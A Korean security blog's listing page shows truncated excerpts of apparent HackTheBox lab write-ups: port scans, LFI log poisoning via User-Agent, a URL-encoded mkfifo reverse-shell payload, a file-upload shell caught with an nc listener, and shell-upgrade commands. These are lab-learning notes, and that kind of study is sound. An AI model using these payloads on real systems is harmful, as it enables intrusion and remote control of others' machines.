정보보안

jujjing@HARU0909:~/tmp2/cascade/scan$ rustscan -a 10.129.40.13.----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'The Modern Day Port Scanner.________________________________________: https://discord.gg/GFrQsGy :: ht..

1. Nmap $ nmap -p- --open --max-retries 2 -Pn -n 10.129.228.111 -oA fullscan Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 16:10 KST Nmap scan report for 10.129.228.111 Host is up (0.085s latency). Not shown: 65516 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135..

PWNED : 총 4시간 1.NMAP $ nmap --script vuln -oA vuln -T4 10.129.69.12 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 11:57 KST Stats: 0:01:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 96.10% done; ETC: 11:59 (0:00:04 remaining) Nmap scan report for 10.129.69.12 Host is up (0.084s latency). Not shown: 982 closed tcp ports (conn-refused) PORT STATE SERVICE ..

LFI가 가능하다.대놓고 phpinfo() 위치를 알려준다.allow_url_include가 Off라 RFI는 불가능하다.Log Poisoning을 위해 log파일 경로를 알아내야 한다./usr/local/etc/apache24/httpd.conf(경로 guessing)에서 log파일 경로를 알려준다./var/log/httpd-access.log를 찾았다. // 다만 firefox와 burp가 파일의 사이즈 때문에 자살한다.. User-Agent에 로그에 삽입되어 실행될 php 코드를 넣고 cmd 매개변수를 통해 nc를 실행한다.pipe shell: Pentest Monkey’s Cheatsheet cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%2..

RCE via Fileupload작은 사이즈( 사이트에 해당 파일을 업로드한다. 업로드된 파일의 URL에 접속한다. 리스닝 하던 포트로 쉘을 획득했다.$ nc -lvnp 4444>connect to [10.10.14.25] from (UNKNOWN) [10.129.67.226] 48594sh: no job control in this shellsh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'bash-4.2$ ^Z[1]+ Stopped nc -lvnp 4444┌──(jujjing㉿HARU0909)-[~/htb/networked/poc]└─$ stty raw -echo; fg>nc -lvnp 4444bash-4.2$ export T..

1. nmap$ nmap -T5 -p- -Pn -n --open --max-retries 2 10.129.67.137 -sV -sC -oA fullscanStarting Nmap 7.94 ( https://nmap.org ) at 2023-09-04 10:34 KSTNmap scan report for 10.129.67.137Host is up (0.097s latency).Not shown: 45970 filtered tcp ports (no-response), 19563 closed tcp ports (conn-refused)Some closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE VER..

1. nmap// 담엔 풀스캔 잘 안되면 이거 써보자.nmap -p- -T5 -oA nmapfull [Target IP]$ nmap -p- -Pn -n --open --max-retries 2 --min-rate 10000 10.129.67.50 -oA allportStarting Nmap 7.94 ( https://nmap.org ) at 2023-09-03 23:39 KSTNmap scan report for 10.129.67.50Host is up (0.11s latency).Not shown: 65305 filtered tcp ports (no-response), 226 closed tcp ports (conn-refused)Some closed ports may be reported as fil..

배운 것 :1. ssh에서 서버와 클라이언트 간에 상호 서명을 지원하는 알고리즘이 없을 때 발생하는 에러 해결법sign_and_send_pubkey: no mutual signature supported--> -o PubkeyAcceptedKeyTypes=+ssh-rsa를 ssh 명령어에 추가  1. nmap$ nmap -sV -sC 10.129.77.85 -Pn -n --max-retries 2 --min-rate 8000 --open --top-ports 2000 -oA svscStarting Nmap 7.94 ( https://nmap.org ) at 2023-09-03 13:45 KSTNmap scan report for 10.129.77.85Host is up (0.10s latency).Not..

OS : LINUX취약점 : pfsense 2.3.1배운 점 : gobuster를 빡세게 돌려야 함. 느낀 점 : credential만 찾으면 바로 root까지 딸 수 있는데 이걸 못 찾아서 몇 시간을 날림.-------------------------------------------------------------------------------------------------------------------------------nmap을 돌려봄.80, 443이 도출됨.lighttpd 1.4.35 버전을 사용하는 것만 나옴.해당 취약점에 대해 열심히 찾아보았으나 결론은 땡. 안 됨.  gobuster를 돌려봄.gobuster dir -u [ip] -w /usr/share/dirb/wordlists/co..